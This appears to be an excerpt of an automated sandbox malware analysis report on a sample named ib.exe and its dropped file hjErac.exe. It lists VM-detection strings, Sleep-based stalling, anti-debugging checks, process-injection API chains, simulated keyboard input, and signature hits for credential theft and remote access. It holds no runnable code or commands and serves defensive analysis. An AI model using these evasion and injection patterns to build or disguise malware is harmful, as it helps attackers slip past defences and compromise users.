Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\ib.exe

Code function: GetForegroundWindow,GetWindowThreadProcessId,CreateThread,CloseHandle,Sleep,?_Xlength_error@std@@YAXPBD@Z,OpenProcess,K32GetProcessImageFileNameA,strstr,K32EnumProcessModulesEx,K32GetModuleFileNameExA,StrStrIA,Sleep,?_Xbad_function_call@std@@YAXXZ,

0_2_003E2510

Source: C:\Users\user\Desktop\ib.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Source: C:\Users\user\Desktop\ib.exe

Stalling execution: Execution stalls by calling Sleep

Source: C:\Users\user\Desktop\ib.exe	Window / User API: threadDelayed 1945			Jump to behavior
Source: C:\Users\user\Desktop\ib.exe	Window / User API: threadDelayed 3716			Jump to behavior
Source: C:\Users\user\Desktop\ib.exe	Window / User API: foregroundWindowGot 1758			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Users\user\Desktop\ib.exe TID: 6196

Thread sleep time: -3716000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\ib.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\ib.exe

Thread sleep count: Count: 1945 delay: -3

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Code function: 2_2_00CB1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00CB1754h

2_2_00CB1718

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Code function: 2_2_00CB29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

2_2_00CB29E2

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Code function: 2_2_00CB2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00CB2B8C

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\			Jump to behavior

Source: Amcache.hve.2.dr	Binary or memory string: VMware
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.2.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.2.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.2.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888644976.0000000000A63000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697547735.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888644976.00000000009EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.2.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.2.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: ib.exe, 00000000.00000002.4134137721.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.2.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.2.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.2.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.2.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.2.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.2.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.2.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.2.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.2.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

API call chain: ExitProcess graph end node

Anti Debugging

Source: C:\Users\user\Desktop\ib.exe

Code function: 0_2_003E31A6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_003E31A6

Source: C:\Users\user\Desktop\ib.exe

Code function: 0_2_003E9044 mov eax, dword ptr fs:[00000030h]

0_2_003E9044

Source: C:\Users\user\Desktop\ib.exe	Code function: 0_2_003E3308 SetUnhandledExceptionFilter,		0_2_003E3308
Source: C:\Users\user\Desktop\ib.exe	Code function: 0_2_003E31A6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_003E31A6
Source: C:\Users\user\Desktop\ib.exe	Code function: 0_2_003E2CCC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_003E2CCC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\ib.exe

Code function: 0_2_003E22C0 OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,GetLastError,GetLastError,_printf,WaitForSingleObject,CloseHandle,

0_2_003E22C0

Source: C:\Users\user\Desktop\ib.exe

Code function: 0_2_003E1670 keybd_event,SendInput,keybd_event,keybd_event,mouse_event,keybd_event,keybd_event,keybd_event,keybd_event,

0_2_003E1670

Source: C:\Users\user\Desktop\ib.exe

Code function: 0_2_003E1670 keybd_event,SendInput,keybd_event,keybd_event,mouse_event,keybd_event,keybd_event,keybd_event,keybd_event,

0_2_003E1670

Source: SciTE.exe.2.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\ib.exe

Code function: 0_2_003E3444 cpuid

0_2_003E3444

Source: C:\Users\user\Desktop\ib.exe

Code function: 0_2_003E3096 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_003E3096

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Code function: 2_2_00CB139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

2_2_00CB139F

Lowering of HIPS / PFW / Operating System Security Settings

Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match

File source: Process Memory Space: hjErac.exe PID: 6996, type: MEMORYSTR

Remote Access Functionality

Source: Yara match

File source: Process Memory Space: hjErac.exe PID: 6996, type: MEMORYSTR